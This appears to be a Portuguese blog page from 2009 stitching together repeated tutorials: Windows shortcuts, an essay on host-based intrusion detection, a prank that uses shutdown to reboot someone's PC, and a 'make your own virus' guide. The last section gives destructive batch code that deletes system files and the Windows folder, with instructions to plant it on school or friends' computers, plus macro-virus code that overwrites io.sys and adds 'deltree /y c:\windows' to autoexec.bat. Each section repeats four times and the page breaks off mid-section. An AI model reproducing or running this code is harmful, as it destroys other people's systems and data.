Anuncie aqui!

terça-feira, 13 de outubro de 2009

Tutorial Atalhos de teclas do windows



Muitas pessoas ficam procurando uma determinada função em algum menu e não sabem que a solução está na ponta dos seus dedos. É só usar um atalho de tecla.

Veja abaixo alguns que podem ser bem úteis




CTRL+C Copiar.

CTRL+X Recortar.
CTRL+V Colar.
CTRL+Z Desfazer.
DELETE Apagar ou Remover.
SHIFT+DELETE Apagar arquivo(s) (sem ir para a lixeira).
CTRL durante arrasto para copiar arquivos selecionados.
CTRL+SHIFT durante arrasto para criar um link (atalho) para o arquivo selecionado.
F2 Renomear item, arquivo.
CTRL+Seta Direita Mover cursor de texto para a próxima palavra.
CTRL+Seta Esquerda Mover cursor de texto para a palavra anterior.
CTRL+Seta Abaixo Mover cursor de texto para o próxima parágrafo.
CTRL+Seta Acima Mover cursor de texto para o parágrafo anterior.
CTRL+SHIFT+Setas Marca bloco de texto.
SHIFT + Setas Selecionar texto num documento, itens do Desktop.
CTRL+A Selecionar Tudo (Ctrl + T em alguns micros).
F3 Buscar, procurar.
CTRL+O Abrir item, arquivo. O mesmo que Enter.
ALT+ENTER Ver propriedades do item, arquivo.
ALT+F4 Fechar janela.
CTRL+F4 Fechar documento corrente.
ALT+TAB Alternar foco entre janelas.
ALT+ESC Ciclar pelos arquivos na ordem em que foram abertos.
F6 Ciclar pelos itens de janela ou Desktop.
F4 Mostrar barra de endereço no Windows Explorer.
SHIFT+F10 O mesmo que clicar com o botão direito do mouse.
ALT+Barra de espaço Mostrar o menu do sistema para a janela ativa.
CTRL+ESC Abrir o menu Iniciar.
ALT+letra sublinhada em menu fechado Mostrar o menu correspondente.
Letra sublinhada em menu aberto ou comando Executar o comando correspondente.
F10 Ativar barra de menu na janela ativa.
Seta Direita Abrir menu à direita ou sub-menu.
Seta Esquerda Abrir menu à esquerda ou fechar sub-menu.
F5 Restaurar a janela ativa.
BACKSPACE Ver diretório (pasta) pai.
ESC Cancelar a tarefa corrente.
SHIFT ao inserir um CD Prevenir que ele execute ou toque automaticamente

Tutorial Atalhos de teclas do windows



Muitas pessoas ficam procurando uma determinada função em algum menu e não sabem que a solução está na ponta dos seus dedos. É só usar um atalho de tecla.

Veja abaixo alguns que podem ser bem úteis




CTRL+C Copiar.

CTRL+X Recortar.
CTRL+V Colar.
CTRL+Z Desfazer.
DELETE Apagar ou Remover.
SHIFT+DELETE Apagar arquivo(s) (sem ir para a lixeira).
CTRL durante arrasto para copiar arquivos selecionados.
CTRL+SHIFT durante arrasto para criar um link (atalho) para o arquivo selecionado.
F2 Renomear item, arquivo.
CTRL+Seta Direita Mover cursor de texto para a próxima palavra.
CTRL+Seta Esquerda Mover cursor de texto para a palavra anterior.
CTRL+Seta Abaixo Mover cursor de texto para o próxima parágrafo.
CTRL+Seta Acima Mover cursor de texto para o parágrafo anterior.
CTRL+SHIFT+Setas Marca bloco de texto.
SHIFT + Setas Selecionar texto num documento, itens do Desktop.
CTRL+A Selecionar Tudo (Ctrl + T em alguns micros).
F3 Buscar, procurar.
CTRL+O Abrir item, arquivo. O mesmo que Enter.
ALT+ENTER Ver propriedades do item, arquivo.
ALT+F4 Fechar janela.
CTRL+F4 Fechar documento corrente.
ALT+TAB Alternar foco entre janelas.
ALT+ESC Ciclar pelos arquivos na ordem em que foram abertos.
F6 Ciclar pelos itens de janela ou Desktop.
F4 Mostrar barra de endereço no Windows Explorer.
SHIFT+F10 O mesmo que clicar com o botão direito do mouse.
ALT+Barra de espaço Mostrar o menu do sistema para a janela ativa.
CTRL+ESC Abrir o menu Iniciar.
ALT+letra sublinhada em menu fechado Mostrar o menu correspondente.
Letra sublinhada em menu aberto ou comando Executar o comando correspondente.
F10 Ativar barra de menu na janela ativa.
Seta Direita Abrir menu à direita ou sub-menu.
Seta Esquerda Abrir menu à esquerda ou fechar sub-menu.
F5 Restaurar a janela ativa.
BACKSPACE Ver diretório (pasta) pai.
ESC Cancelar a tarefa corrente.
SHIFT ao inserir um CD Prevenir que ele execute ou toque automaticamente

Tutorial Atalhos de teclas do windows



Muitas pessoas ficam procurando uma determinada função em algum menu e não sabem que a solução está na ponta dos seus dedos. É só usar um atalho de tecla.

Veja abaixo alguns que podem ser bem úteis




CTRL+C Copiar.

CTRL+X Recortar.
CTRL+V Colar.
CTRL+Z Desfazer.
DELETE Apagar ou Remover.
SHIFT+DELETE Apagar arquivo(s) (sem ir para a lixeira).
CTRL durante arrasto para copiar arquivos selecionados.
CTRL+SHIFT durante arrasto para criar um link (atalho) para o arquivo selecionado.
F2 Renomear item, arquivo.
CTRL+Seta Direita Mover cursor de texto para a próxima palavra.
CTRL+Seta Esquerda Mover cursor de texto para a palavra anterior.
CTRL+Seta Abaixo Mover cursor de texto para o próxima parágrafo.
CTRL+Seta Acima Mover cursor de texto para o parágrafo anterior.
CTRL+SHIFT+Setas Marca bloco de texto.
SHIFT + Setas Selecionar texto num documento, itens do Desktop.
CTRL+A Selecionar Tudo (Ctrl + T em alguns micros).
F3 Buscar, procurar.
CTRL+O Abrir item, arquivo. O mesmo que Enter.
ALT+ENTER Ver propriedades do item, arquivo.
ALT+F4 Fechar janela.
CTRL+F4 Fechar documento corrente.
ALT+TAB Alternar foco entre janelas.
ALT+ESC Ciclar pelos arquivos na ordem em que foram abertos.
F6 Ciclar pelos itens de janela ou Desktop.
F4 Mostrar barra de endereço no Windows Explorer.
SHIFT+F10 O mesmo que clicar com o botão direito do mouse.
ALT+Barra de espaço Mostrar o menu do sistema para a janela ativa.
CTRL+ESC Abrir o menu Iniciar.
ALT+letra sublinhada em menu fechado Mostrar o menu correspondente.
Letra sublinhada em menu aberto ou comando Executar o comando correspondente.
F10 Ativar barra de menu na janela ativa.
Seta Direita Abrir menu à direita ou sub-menu.
Seta Esquerda Abrir menu à esquerda ou fechar sub-menu.
F5 Restaurar a janela ativa.
BACKSPACE Ver diretório (pasta) pai.
ESC Cancelar a tarefa corrente.
SHIFT ao inserir um CD Prevenir que ele execute ou toque automaticamente

Tutorial Atalhos de teclas do windows



Muitas pessoas ficam procurando uma determinada função em algum menu e não sabem que a solução está na ponta dos seus dedos. É só usar um atalho de tecla.

Veja abaixo alguns que podem ser bem úteis




CTRL+C Copiar.

CTRL+X Recortar.
CTRL+V Colar.
CTRL+Z Desfazer.
DELETE Apagar ou Remover.
SHIFT+DELETE Apagar arquivo(s) (sem ir para a lixeira).
CTRL durante arrasto para copiar arquivos selecionados.
CTRL+SHIFT durante arrasto para criar um link (atalho) para o arquivo selecionado.
F2 Renomear item, arquivo.
CTRL+Seta Direita Mover cursor de texto para a próxima palavra.
CTRL+Seta Esquerda Mover cursor de texto para a palavra anterior.
CTRL+Seta Abaixo Mover cursor de texto para o próxima parágrafo.
CTRL+Seta Acima Mover cursor de texto para o parágrafo anterior.
CTRL+SHIFT+Setas Marca bloco de texto.
SHIFT + Setas Selecionar texto num documento, itens do Desktop.
CTRL+A Selecionar Tudo (Ctrl + T em alguns micros).
F3 Buscar, procurar.
CTRL+O Abrir item, arquivo. O mesmo que Enter.
ALT+ENTER Ver propriedades do item, arquivo.
ALT+F4 Fechar janela.
CTRL+F4 Fechar documento corrente.
ALT+TAB Alternar foco entre janelas.
ALT+ESC Ciclar pelos arquivos na ordem em que foram abertos.
F6 Ciclar pelos itens de janela ou Desktop.
F4 Mostrar barra de endereço no Windows Explorer.
SHIFT+F10 O mesmo que clicar com o botão direito do mouse.
ALT+Barra de espaço Mostrar o menu do sistema para a janela ativa.
CTRL+ESC Abrir o menu Iniciar.
ALT+letra sublinhada em menu fechado Mostrar o menu correspondente.
Letra sublinhada em menu aberto ou comando Executar o comando correspondente.
F10 Ativar barra de menu na janela ativa.
Seta Direita Abrir menu à direita ou sub-menu.
Seta Esquerda Abrir menu à esquerda ou fechar sub-menu.
F5 Restaurar a janela ativa.
BACKSPACE Ver diretório (pasta) pai.
ESC Cancelar a tarefa corrente.
SHIFT ao inserir um CD Prevenir que ele execute ou toque automaticamente

Tutorial como Detectar Instrusos

Recentemente, analisei alguns aspectos de segurança de sistemas de detecção de intrusão (IDS) baseados em observação de tráfego de rede. Observei que embora os sistemas de IDS via rede sejam bastante interessantes para detectar possíveis intrusões, estes sistemas possuem limitações que, caso não sejam endereçadas adequadamente, podem comprometer a funcionalidade dos mesmos.

Comparando com o modelo baseado em rede, onde um dispositivo fica "ouvindo" todo o
tráfego de rede, o modelo de host é baseado no uso de agentes. De uma forma geral, todos eles possuem um pequeno programa (agente), instalado no sistema que se quer proteger. Este agente é responsável por analisar, o mais rapidamente possível, vários indicadores do sistema, como logs, níveis de uso de CPU, que usuários estão conectados, etc... Com base nas suas regras pré-programadas (sejam elas baseadas em assinatura ou perfis, ou ambos), o agente decide gerar ou não alarmes. Caso o alarme seja gerado, ele freqüentemente é enviado a um servidor central (chamado de "gerente") que pode tomar outras ações adicionais (chamar o operador por pager, gerar log, etc...).

O tipo de informações que um agente pode monitorar, o grau de sofisticação com o qual ele monitora essas informações e que tipo de ação ele pode tomar variam de sistema para sistema. No geral, todos eles permitem monitorar:

· Logs do sistema operacional. No caso de Windows NT, os diversos EventLog. No caso de Unix, o log controlado pelo syslog. Nesses logs são armazenados eventos básicos, como auditoria de arquivos, logins bem sucedidos ou não, início e término de programas, entre outros.

· Contadores ou indicadores do sistema. Nesse caso, são monitorados aspectos como consumo de CPU (via Performance Monitor do NT ou sar do Unix), espaço disponível em disco e consumo de memória, entre outros. Embora sejam dados não diretamente relacionados à segurança, uma mudança nestes parâmetros pode indicar que algo mudou significativamente. Como exemplo, caso um servidor esteja sendo utilizado indevidamente para tentar quebrar senhas (com programas como L0phtcrack ou Crack, por exemplo) o consumo de CPU poderá ser notadamente maior.

Alguns outros sistemas de detecção de intrusão via host também permitem a monitoração de outros logs, especificados pelo usuário. Nesse caso, podem ser monitorados os logs de programas que, por um motivo ou outro, não usam os logs do sistema. Nessa categoria podemos incluir sistemas de banco de dados, servidores de autenticação (como Radius/Tacacs), servidores Web, entre outros. Nesses casos, o agente deve ser "treinado" em o que deve ser analisado do log.

Com todas essas características, os IDS baseados em host acabam por oferecer vantagens significativas para o implementador de IDS. A principal delas é que a qualidade da informação coletada. Como o log a ser gerado pela aplicação pode ser o resultado de uma longa transação, por exemplo, é possível detectar ataques ou situações que uma análise dos pacotes individuais não mostraria.

Outra vantagem do modelo de IDS de host é que, como o agente é especializado para um determinado sistema operacional, ele pode inspecionar características desse sistema não acessíveis via rede. Existem diversas vulnerabilidades conhecidas, tanto em Unix como em NT, que só podem ser exploradas por usuários locais. É comum que indicadores dessas vulnerabilidades (ou de tentativas de exploração delas) não sejam percebidas por quem está "fora" do sistema, como um IDS de rede.

Por outro lado, é importante conhecermos as limitações dos IDS de host.

Em primeiro lugar, um IDS de host é significativamente mais trabalhoso de implementar, pois necessita agentes em todos os equipamentos a serem protegidos. Se estamos falando de 200, 300 servidores, pode ser um impacto grande ter que instalar e configurar agentes em todos eles.

Outro problema com IDS de host é a não existência de um agente para o sistema operacional em questão. São poucos os produtos que possuem suporte a uma gama variada de sistemas operacionais. A maioria tende a suportar Windows (mesmo assim quase sempre somente NT), Solaris e talvez outro tipo de Unix, como HP-UX, AIX ou Linux. De que adianta um IDS que não suporta a plataforma desejada?

Outro ponto a ser observado diz respeito à qualidade da informação inicial. Caso os logs observados pelo IDS não indiquem os eventos desejados em um grau de detalhe adequado, o IDS não pode extrair nada dali. No caso de um sistema que inspecione o syslog de Unix, por exemplo, não podemos detectar possíveis incidentes com o daemon de DNS (ou de FTP) se o mesmo não foi configurado para gerar logs no syslog (ou se o IDS não foi configurado para coletar os logs em outro lugar).

Finalmente, outro ponto diz respeito à segurança do próprio daemon (ou serviço) do IDS. Como o IDS roda no próprio sistema, caso um atacante consiga obter acesso privilegiado (root/Administrator) ele pode desabilitar o agente do IDS. Caso não exista nenhum mecanismo de checagem periódica, a intrusão poderá não ser detectada.

Ao final de nossa análise técnica sobre IDS, espero que tenha ficado claro que um sistema de detecção de intrusão pode ser um excelente acréscimo ao conjunto de mecanismos de segurança da organização. Um IDS pode indicar atividades suspeitas no ambiente, levando a equipe de segurança a identificar uma intrusão ou uma tentativa de intrusão. Ou seja, no final das contas, ainda há muito trabalho a ser feito depois de instalado os mecanismos de detecção de intrusão

Tutorial como Detectar Instrusos

Recentemente, analisei alguns aspectos de segurança de sistemas de detecção de intrusão (IDS) baseados em observação de tráfego de rede. Observei que embora os sistemas de IDS via rede sejam bastante interessantes para detectar possíveis intrusões, estes sistemas possuem limitações que, caso não sejam endereçadas adequadamente, podem comprometer a funcionalidade dos mesmos.

Comparando com o modelo baseado em rede, onde um dispositivo fica "ouvindo" todo o
tráfego de rede, o modelo de host é baseado no uso de agentes. De uma forma geral, todos eles possuem um pequeno programa (agente), instalado no sistema que se quer proteger. Este agente é responsável por analisar, o mais rapidamente possível, vários indicadores do sistema, como logs, níveis de uso de CPU, que usuários estão conectados, etc... Com base nas suas regras pré-programadas (sejam elas baseadas em assinatura ou perfis, ou ambos), o agente decide gerar ou não alarmes. Caso o alarme seja gerado, ele freqüentemente é enviado a um servidor central (chamado de "gerente") que pode tomar outras ações adicionais (chamar o operador por pager, gerar log, etc...).

O tipo de informações que um agente pode monitorar, o grau de sofisticação com o qual ele monitora essas informações e que tipo de ação ele pode tomar variam de sistema para sistema. No geral, todos eles permitem monitorar:

· Logs do sistema operacional. No caso de Windows NT, os diversos EventLog. No caso de Unix, o log controlado pelo syslog. Nesses logs são armazenados eventos básicos, como auditoria de arquivos, logins bem sucedidos ou não, início e término de programas, entre outros.

· Contadores ou indicadores do sistema. Nesse caso, são monitorados aspectos como consumo de CPU (via Performance Monitor do NT ou sar do Unix), espaço disponível em disco e consumo de memória, entre outros. Embora sejam dados não diretamente relacionados à segurança, uma mudança nestes parâmetros pode indicar que algo mudou significativamente. Como exemplo, caso um servidor esteja sendo utilizado indevidamente para tentar quebrar senhas (com programas como L0phtcrack ou Crack, por exemplo) o consumo de CPU poderá ser notadamente maior.

Alguns outros sistemas de detecção de intrusão via host também permitem a monitoração de outros logs, especificados pelo usuário. Nesse caso, podem ser monitorados os logs de programas que, por um motivo ou outro, não usam os logs do sistema. Nessa categoria podemos incluir sistemas de banco de dados, servidores de autenticação (como Radius/Tacacs), servidores Web, entre outros. Nesses casos, o agente deve ser "treinado" em o que deve ser analisado do log.

Com todas essas características, os IDS baseados em host acabam por oferecer vantagens significativas para o implementador de IDS. A principal delas é que a qualidade da informação coletada. Como o log a ser gerado pela aplicação pode ser o resultado de uma longa transação, por exemplo, é possível detectar ataques ou situações que uma análise dos pacotes individuais não mostraria.

Outra vantagem do modelo de IDS de host é que, como o agente é especializado para um determinado sistema operacional, ele pode inspecionar características desse sistema não acessíveis via rede. Existem diversas vulnerabilidades conhecidas, tanto em Unix como em NT, que só podem ser exploradas por usuários locais. É comum que indicadores dessas vulnerabilidades (ou de tentativas de exploração delas) não sejam percebidas por quem está "fora" do sistema, como um IDS de rede.

Por outro lado, é importante conhecermos as limitações dos IDS de host.

Em primeiro lugar, um IDS de host é significativamente mais trabalhoso de implementar, pois necessita agentes em todos os equipamentos a serem protegidos. Se estamos falando de 200, 300 servidores, pode ser um impacto grande ter que instalar e configurar agentes em todos eles.

Outro problema com IDS de host é a não existência de um agente para o sistema operacional em questão. São poucos os produtos que possuem suporte a uma gama variada de sistemas operacionais. A maioria tende a suportar Windows (mesmo assim quase sempre somente NT), Solaris e talvez outro tipo de Unix, como HP-UX, AIX ou Linux. De que adianta um IDS que não suporta a plataforma desejada?

Outro ponto a ser observado diz respeito à qualidade da informação inicial. Caso os logs observados pelo IDS não indiquem os eventos desejados em um grau de detalhe adequado, o IDS não pode extrair nada dali. No caso de um sistema que inspecione o syslog de Unix, por exemplo, não podemos detectar possíveis incidentes com o daemon de DNS (ou de FTP) se o mesmo não foi configurado para gerar logs no syslog (ou se o IDS não foi configurado para coletar os logs em outro lugar).

Finalmente, outro ponto diz respeito à segurança do próprio daemon (ou serviço) do IDS. Como o IDS roda no próprio sistema, caso um atacante consiga obter acesso privilegiado (root/Administrator) ele pode desabilitar o agente do IDS. Caso não exista nenhum mecanismo de checagem periódica, a intrusão poderá não ser detectada.

Ao final de nossa análise técnica sobre IDS, espero que tenha ficado claro que um sistema de detecção de intrusão pode ser um excelente acréscimo ao conjunto de mecanismos de segurança da organização. Um IDS pode indicar atividades suspeitas no ambiente, levando a equipe de segurança a identificar uma intrusão ou uma tentativa de intrusão. Ou seja, no final das contas, ainda há muito trabalho a ser feito depois de instalado os mecanismos de detecção de intrusão

Tutorial como Detectar Instrusos

Recentemente, analisei alguns aspectos de segurança de sistemas de detecção de intrusão (IDS) baseados em observação de tráfego de rede. Observei que embora os sistemas de IDS via rede sejam bastante interessantes para detectar possíveis intrusões, estes sistemas possuem limitações que, caso não sejam endereçadas adequadamente, podem comprometer a funcionalidade dos mesmos.

Comparando com o modelo baseado em rede, onde um dispositivo fica "ouvindo" todo o
tráfego de rede, o modelo de host é baseado no uso de agentes. De uma forma geral, todos eles possuem um pequeno programa (agente), instalado no sistema que se quer proteger. Este agente é responsável por analisar, o mais rapidamente possível, vários indicadores do sistema, como logs, níveis de uso de CPU, que usuários estão conectados, etc... Com base nas suas regras pré-programadas (sejam elas baseadas em assinatura ou perfis, ou ambos), o agente decide gerar ou não alarmes. Caso o alarme seja gerado, ele freqüentemente é enviado a um servidor central (chamado de "gerente") que pode tomar outras ações adicionais (chamar o operador por pager, gerar log, etc...).

O tipo de informações que um agente pode monitorar, o grau de sofisticação com o qual ele monitora essas informações e que tipo de ação ele pode tomar variam de sistema para sistema. No geral, todos eles permitem monitorar:

· Logs do sistema operacional. No caso de Windows NT, os diversos EventLog. No caso de Unix, o log controlado pelo syslog. Nesses logs são armazenados eventos básicos, como auditoria de arquivos, logins bem sucedidos ou não, início e término de programas, entre outros.

· Contadores ou indicadores do sistema. Nesse caso, são monitorados aspectos como consumo de CPU (via Performance Monitor do NT ou sar do Unix), espaço disponível em disco e consumo de memória, entre outros. Embora sejam dados não diretamente relacionados à segurança, uma mudança nestes parâmetros pode indicar que algo mudou significativamente. Como exemplo, caso um servidor esteja sendo utilizado indevidamente para tentar quebrar senhas (com programas como L0phtcrack ou Crack, por exemplo) o consumo de CPU poderá ser notadamente maior.

Alguns outros sistemas de detecção de intrusão via host também permitem a monitoração de outros logs, especificados pelo usuário. Nesse caso, podem ser monitorados os logs de programas que, por um motivo ou outro, não usam os logs do sistema. Nessa categoria podemos incluir sistemas de banco de dados, servidores de autenticação (como Radius/Tacacs), servidores Web, entre outros. Nesses casos, o agente deve ser "treinado" em o que deve ser analisado do log.

Com todas essas características, os IDS baseados em host acabam por oferecer vantagens significativas para o implementador de IDS. A principal delas é que a qualidade da informação coletada. Como o log a ser gerado pela aplicação pode ser o resultado de uma longa transação, por exemplo, é possível detectar ataques ou situações que uma análise dos pacotes individuais não mostraria.

Outra vantagem do modelo de IDS de host é que, como o agente é especializado para um determinado sistema operacional, ele pode inspecionar características desse sistema não acessíveis via rede. Existem diversas vulnerabilidades conhecidas, tanto em Unix como em NT, que só podem ser exploradas por usuários locais. É comum que indicadores dessas vulnerabilidades (ou de tentativas de exploração delas) não sejam percebidas por quem está "fora" do sistema, como um IDS de rede.

Por outro lado, é importante conhecermos as limitações dos IDS de host.

Em primeiro lugar, um IDS de host é significativamente mais trabalhoso de implementar, pois necessita agentes em todos os equipamentos a serem protegidos. Se estamos falando de 200, 300 servidores, pode ser um impacto grande ter que instalar e configurar agentes em todos eles.

Outro problema com IDS de host é a não existência de um agente para o sistema operacional em questão. São poucos os produtos que possuem suporte a uma gama variada de sistemas operacionais. A maioria tende a suportar Windows (mesmo assim quase sempre somente NT), Solaris e talvez outro tipo de Unix, como HP-UX, AIX ou Linux. De que adianta um IDS que não suporta a plataforma desejada?

Outro ponto a ser observado diz respeito à qualidade da informação inicial. Caso os logs observados pelo IDS não indiquem os eventos desejados em um grau de detalhe adequado, o IDS não pode extrair nada dali. No caso de um sistema que inspecione o syslog de Unix, por exemplo, não podemos detectar possíveis incidentes com o daemon de DNS (ou de FTP) se o mesmo não foi configurado para gerar logs no syslog (ou se o IDS não foi configurado para coletar os logs em outro lugar).

Finalmente, outro ponto diz respeito à segurança do próprio daemon (ou serviço) do IDS. Como o IDS roda no próprio sistema, caso um atacante consiga obter acesso privilegiado (root/Administrator) ele pode desabilitar o agente do IDS. Caso não exista nenhum mecanismo de checagem periódica, a intrusão poderá não ser detectada.

Ao final de nossa análise técnica sobre IDS, espero que tenha ficado claro que um sistema de detecção de intrusão pode ser um excelente acréscimo ao conjunto de mecanismos de segurança da organização. Um IDS pode indicar atividades suspeitas no ambiente, levando a equipe de segurança a identificar uma intrusão ou uma tentativa de intrusão. Ou seja, no final das contas, ainda há muito trabalho a ser feito depois de instalado os mecanismos de detecção de intrusão

Tutorial como Detectar Instrusos

Recentemente, analisei alguns aspectos de segurança de sistemas de detecção de intrusão (IDS) baseados em observação de tráfego de rede. Observei que embora os sistemas de IDS via rede sejam bastante interessantes para detectar possíveis intrusões, estes sistemas possuem limitações que, caso não sejam endereçadas adequadamente, podem comprometer a funcionalidade dos mesmos.

Comparando com o modelo baseado em rede, onde um dispositivo fica "ouvindo" todo o
tráfego de rede, o modelo de host é baseado no uso de agentes. De uma forma geral, todos eles possuem um pequeno programa (agente), instalado no sistema que se quer proteger. Este agente é responsável por analisar, o mais rapidamente possível, vários indicadores do sistema, como logs, níveis de uso de CPU, que usuários estão conectados, etc... Com base nas suas regras pré-programadas (sejam elas baseadas em assinatura ou perfis, ou ambos), o agente decide gerar ou não alarmes. Caso o alarme seja gerado, ele freqüentemente é enviado a um servidor central (chamado de "gerente") que pode tomar outras ações adicionais (chamar o operador por pager, gerar log, etc...).

O tipo de informações que um agente pode monitorar, o grau de sofisticação com o qual ele monitora essas informações e que tipo de ação ele pode tomar variam de sistema para sistema. No geral, todos eles permitem monitorar:

· Logs do sistema operacional. No caso de Windows NT, os diversos EventLog. No caso de Unix, o log controlado pelo syslog. Nesses logs são armazenados eventos básicos, como auditoria de arquivos, logins bem sucedidos ou não, início e término de programas, entre outros.

· Contadores ou indicadores do sistema. Nesse caso, são monitorados aspectos como consumo de CPU (via Performance Monitor do NT ou sar do Unix), espaço disponível em disco e consumo de memória, entre outros. Embora sejam dados não diretamente relacionados à segurança, uma mudança nestes parâmetros pode indicar que algo mudou significativamente. Como exemplo, caso um servidor esteja sendo utilizado indevidamente para tentar quebrar senhas (com programas como L0phtcrack ou Crack, por exemplo) o consumo de CPU poderá ser notadamente maior.

Alguns outros sistemas de detecção de intrusão via host também permitem a monitoração de outros logs, especificados pelo usuário. Nesse caso, podem ser monitorados os logs de programas que, por um motivo ou outro, não usam os logs do sistema. Nessa categoria podemos incluir sistemas de banco de dados, servidores de autenticação (como Radius/Tacacs), servidores Web, entre outros. Nesses casos, o agente deve ser "treinado" em o que deve ser analisado do log.

Com todas essas características, os IDS baseados em host acabam por oferecer vantagens significativas para o implementador de IDS. A principal delas é que a qualidade da informação coletada. Como o log a ser gerado pela aplicação pode ser o resultado de uma longa transação, por exemplo, é possível detectar ataques ou situações que uma análise dos pacotes individuais não mostraria.

Outra vantagem do modelo de IDS de host é que, como o agente é especializado para um determinado sistema operacional, ele pode inspecionar características desse sistema não acessíveis via rede. Existem diversas vulnerabilidades conhecidas, tanto em Unix como em NT, que só podem ser exploradas por usuários locais. É comum que indicadores dessas vulnerabilidades (ou de tentativas de exploração delas) não sejam percebidas por quem está "fora" do sistema, como um IDS de rede.

Por outro lado, é importante conhecermos as limitações dos IDS de host.

Em primeiro lugar, um IDS de host é significativamente mais trabalhoso de implementar, pois necessita agentes em todos os equipamentos a serem protegidos. Se estamos falando de 200, 300 servidores, pode ser um impacto grande ter que instalar e configurar agentes em todos eles.

Outro problema com IDS de host é a não existência de um agente para o sistema operacional em questão. São poucos os produtos que possuem suporte a uma gama variada de sistemas operacionais. A maioria tende a suportar Windows (mesmo assim quase sempre somente NT), Solaris e talvez outro tipo de Unix, como HP-UX, AIX ou Linux. De que adianta um IDS que não suporta a plataforma desejada?

Outro ponto a ser observado diz respeito à qualidade da informação inicial. Caso os logs observados pelo IDS não indiquem os eventos desejados em um grau de detalhe adequado, o IDS não pode extrair nada dali. No caso de um sistema que inspecione o syslog de Unix, por exemplo, não podemos detectar possíveis incidentes com o daemon de DNS (ou de FTP) se o mesmo não foi configurado para gerar logs no syslog (ou se o IDS não foi configurado para coletar os logs em outro lugar).

Finalmente, outro ponto diz respeito à segurança do próprio daemon (ou serviço) do IDS. Como o IDS roda no próprio sistema, caso um atacante consiga obter acesso privilegiado (root/Administrator) ele pode desabilitar o agente do IDS. Caso não exista nenhum mecanismo de checagem periódica, a intrusão poderá não ser detectada.

Ao final de nossa análise técnica sobre IDS, espero que tenha ficado claro que um sistema de detecção de intrusão pode ser um excelente acréscimo ao conjunto de mecanismos de segurança da organização. Um IDS pode indicar atividades suspeitas no ambiente, levando a equipe de segurança a identificar uma intrusão ou uma tentativa de intrusão. Ou seja, no final das contas, ainda há muito trabalho a ser feito depois de instalado os mecanismos de detecção de intrusão

Tutorial - Desligando o PC de alguém


Desligando o Computador

Para desligar o computador de alguma pessoa pela Internet, por incrível que pareça é um procedimento simples e usaremos uma rotina do MS-DOS que nós mesmos vamos criar.


Como fazer?




Vamos iniciar a criação da nossa rotina, clique em INICIAR/EXECUTAR e digite o comando NOTEPAD, na realidade, este comando exibe o BLOCO DEE NOTAS do Windows. Já no Bloco de Notas, teremos que digitar o seguinte comando do MS-DOS:

shutdown –r – c “teste” –t 15

E na hora de salvar, coloque

o nome que você deseja.BAT


Como se defender?


Para se defender deste ataque, após clicar, mesmo que por acidente ou inocência, você deve ser rápido e acessar:

- INICIAR / EXECUTAR e digitar o comando:

shutdown –a e clique em OK, desta forma voce neutraliza a ação do comando com um contra-comando.

Tutorial - Desligando o PC de alguém


Desligando o Computador

Para desligar o computador de alguma pessoa pela Internet, por incrível que pareça é um procedimento simples e usaremos uma rotina do MS-DOS que nós mesmos vamos criar.


Como fazer?




Vamos iniciar a criação da nossa rotina, clique em INICIAR/EXECUTAR e digite o comando NOTEPAD, na realidade, este comando exibe o BLOCO DEE NOTAS do Windows. Já no Bloco de Notas, teremos que digitar o seguinte comando do MS-DOS:

shutdown –r – c “teste” –t 15

E na hora de salvar, coloque

o nome que você deseja.BAT


Como se defender?


Para se defender deste ataque, após clicar, mesmo que por acidente ou inocência, você deve ser rápido e acessar:

- INICIAR / EXECUTAR e digitar o comando:

shutdown –a e clique em OK, desta forma voce neutraliza a ação do comando com um contra-comando.

Tutorial - Desligando o PC de alguém


Desligando o Computador

Para desligar o computador de alguma pessoa pela Internet, por incrível que pareça é um procedimento simples e usaremos uma rotina do MS-DOS que nós mesmos vamos criar.


Como fazer?




Vamos iniciar a criação da nossa rotina, clique em INICIAR/EXECUTAR e digite o comando NOTEPAD, na realidade, este comando exibe o BLOCO DEE NOTAS do Windows. Já no Bloco de Notas, teremos que digitar o seguinte comando do MS-DOS:

shutdown –r – c “teste” –t 15

E na hora de salvar, coloque

o nome que você deseja.BAT


Como se defender?


Para se defender deste ataque, após clicar, mesmo que por acidente ou inocência, você deve ser rápido e acessar:

- INICIAR / EXECUTAR e digitar o comando:

shutdown –a e clique em OK, desta forma voce neutraliza a ação do comando com um contra-comando.

Tutorial - Desligando o PC de alguém


Desligando o Computador

Para desligar o computador de alguma pessoa pela Internet, por incrível que pareça é um procedimento simples e usaremos uma rotina do MS-DOS que nós mesmos vamos criar.


Como fazer?




Vamos iniciar a criação da nossa rotina, clique em INICIAR/EXECUTAR e digite o comando NOTEPAD, na realidade, este comando exibe o BLOCO DEE NOTAS do Windows. Já no Bloco de Notas, teremos que digitar o seguinte comando do MS-DOS:

shutdown –r – c “teste” –t 15

E na hora de salvar, coloque

o nome que você deseja.BAT


Como se defender?


Para se defender deste ataque, após clicar, mesmo que por acidente ou inocência, você deve ser rápido e acessar:

- INICIAR / EXECUTAR e digitar o comando:

shutdown –a e clique em OK, desta forma voce neutraliza a ação do comando com um contra-comando.

Tutorial Como fazer seu próprio Vírus

Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)
Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:
copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.

VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.

Vírus 12/04
Sub MAIN
If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then
DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”
Close #1
End if
Open “c:\autoexec.bat” For Output As #1
Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”
Close #1
End Sub

ROTINA 2

Sub MAIN
Open “C:\imaiden.txt” for Output As #1”
Print #1 “Código em hexadecimal”
Print #1 “Código em hexadecimal” ‘(continuação)...
Close #1
Shell “debug texto.txt”
Shell “c:\imaiden.com”
End Sub

ROTINA 3

